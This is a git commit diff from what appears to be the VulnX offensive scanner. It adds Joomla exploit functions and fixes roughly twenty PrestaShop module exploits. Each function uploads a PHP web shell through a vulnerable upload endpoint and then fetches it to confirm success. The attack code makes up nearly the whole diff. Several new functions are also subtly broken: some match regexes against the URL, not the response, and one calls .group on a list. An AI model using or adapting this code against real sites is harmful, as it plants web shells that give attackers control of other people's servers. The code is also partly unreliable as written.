fix prestashop requests analyses & added 3 joomla exploit.

anouarbensaad · Jun 3, 2019 · bc01c5d · bc01c5d
1 parent 275fb4c
commit bc01c5d
Show file tree

Hide file tree

Showing 3 changed files with 76 additions and 22 deletions.
diff --git a/modules/jooExploits.py b/modules/jooExploits.py
@@ -7,6 +7,9 @@
 year = now.strftime('%Y')
 month= now.strftime('%m')
 
+import os
+Session = requests.Session()
+
 from common.colors import failexploit , vulnexploit , que , info , good
 from common.requestUp import sendrequest as vxpost
 from common.requestUp import getrequest as vxget
@@ -169,3 +172,53 @@ def joomla_foxcontact(url,headers,timeout):
     else: 
         print (' %s fox Contact            %s' %(que , failexploit))
 
+def comadsmanager(url,headers):
+    endpoint = url + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.html')
+    files= {'image': (name_img,img,'form-data',{'Expires': '0'}) }
+    upload_file = Session.post(url,files=files)
+    shellup = url + "/tmp/plupload/VulnX.html"
+    checkShell = requests.get(shellup).text
+    statusCheck = re.findall(re.compile(r'VulnX'),checkShell)
+    if statusCheck:
+        print(' %s comadsmanager         %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s comadsmanager         %s' %(que , failexploit))  
+
+def comblog(url,headers):
+    endpoint = url + "/index.php?option=com_myblog&task=ajaxupload"
+    checkShell = requests.get(endpoint).text
+    statusCheck = re.findall(re.compile(r'has been uploaded'),endpoint)
+    if statusCheck:
+        print(' %s comblog               %s    %s' %(que,vulnexploit,endpoint))
+    else:
+        print(' %s comblog               %s' %(que , failexploit))  
+
+def comusers(url,headers):
+    endpoint = url + "/index.php?option=com_users&view=registration"
+    checkShell = requests.get(endpoint).text
+    statusCheck = re.findall(re.compile(r'jform_email2-lbl'),endpoint)
+    if statusCheck:
+        print(' %s comusers              %s    %s' %(que,vulnexploit,endpoint))
+    else:
+        print(' %s comusers              %s' %(que , failexploit))  
+
+def comweblinks(url,headers):
+    endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author="
+    token = re.findall(re.compile(r'<form action=\"(.*?)" id="uploadForm\"'),endpoint)
+    if token:
+        url = token.group(1)
+    img = open('shell/VulnX.php', 'rb')
+    name_img= os.path.basename('shell/VulnX.gif')
+    fieldname = "image[]"
+    files= {'image': (name_img,img,'form-data',{'Expires': '0'})}
+    data = { fieldname : files }
+    upload_file = Session.post(url,data)
+    shellup = url + "/images/VulnX.gif"
+    checkShell = requests.get(shellup).status_code
+    statusCheck = re.findall(re.compile(r'200'),checkShell)
+    if statusCheck:
+        print(' %s comweblinks           %s    %s' %(que,vulnexploit,shellup))
+    else:
+        print(' %s comweblinks           %s' %(que , failexploit))
diff --git a/modules/prestaExploits.py b/modules/prestaExploits.py
@@ -28,7 +28,7 @@ def soopabanners(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/soopabanners/slides/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s soopa-banner          %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -43,7 +43,7 @@ def vtslide(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s vterm-slideshowbar    %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -58,7 +58,7 @@ def simpleslideshow(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/simpleslideshow/slides/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s simple-slideshow      %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -73,7 +73,7 @@ def productpageadverts(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/productpageadverts/slides/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s pageadvertise         %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -88,7 +88,7 @@ def productpageadvertsb(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/homepageadvertise2/slides/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s pageadvertise2        %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -103,7 +103,7 @@ def jro_homepageadvertise(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s jro_homepageadvertise %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -118,7 +118,7 @@ def attributewizardpro(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s attribute-wizardpro   %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -133,7 +133,7 @@ def oneattributewizardpro(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/1attributewizardpro/file_uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s oneattributewizardpro %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -149,7 +149,7 @@ def attributewizardpro_old(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/attributewizardpro.OLD/file_uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s attributewizardpro_old%s    %s' %(que,vulnexploit,shellup))
     else:
@@ -164,7 +164,7 @@ def attributewizardpro_x(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s attributewizardpro    %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -179,7 +179,7 @@ def advancedslider(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s advancedslider        %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -195,7 +195,7 @@ def cartabandonmentpro(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s cartabandonmentpro    %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -210,7 +210,7 @@ def cartabandonmentpro_old(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/cartabandonmentproOld/uploads/VulnX.php.png?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s cartabandonmentpro_old%s    %s' %(que,vulnexploit,shellup))
     else:
@@ -225,7 +225,7 @@ def videostab(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s videostab             %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -241,7 +241,7 @@ def wg24themeadministration(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s wg24themeadmin        %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -258,7 +258,7 @@ def fieldvmegamenu(url,headers):
     upload_file = Session.post(url,data)
     shellup = url + "/modules/fieldvmegamenu/uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s fieldvmegamenu        %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -274,7 +274,7 @@ def wdoptionpanel(url,headers):
     upload_file = Session.post(url,files=files)
     shellup = url + "/modules/wdoptionpanel/upload/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s wdoptionpanel         %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -291,7 +291,7 @@ def pk_flexmenu(url,headers):
     upload_file = Session.post(url,data)
     shellup = url + "/modules/pk_flexmenu/uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s pk_flexmenu           %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -308,7 +308,7 @@ def pk_vertflexmenu(url,headers):
     upload_file = Session.post(url,data)
     shellup = url + "/modules/pk_vertflexmenu/uploads/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s pk_flexmenu           %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -325,7 +325,7 @@ def nvn_export_orders(url,headers):
     upload_file = Session.post(url,data)
     shellup = url + "/modules/nvn_export_orders/nvn_extra_add.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s nvn_export_orders     %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -342,7 +342,7 @@ def tdpsthemeoptionpanel(url,headers):
     upload_file = Session.post(url,data)
     shellup = url + "/modules/tdpsthemeoptionpanel/upload/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s tdpsthemeoptionpanel  %s    %s' %(que,vulnexploit,shellup))
     else:
@@ -359,7 +359,7 @@ def masseditproduct(url,headers):
     upload_file = Session.post(url,data)
     shellup = url + "/masseditproduct/uploads/file/VulnX.php?Vuln=X"
     checkShell = requests.get(shellup).text
-    statusCheck = re.findall(re.compile(r'Vuln X'),upload_file)
+    statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
     if statusCheck:
         print(' %s masseditproduct       %s    %s' %(que,vulnexploit,shellup))
     else:

diff --git a/shell/VulnX.html b/shell/VulnX.html
@@ -0,0 +1 @@
+VulnX Uploading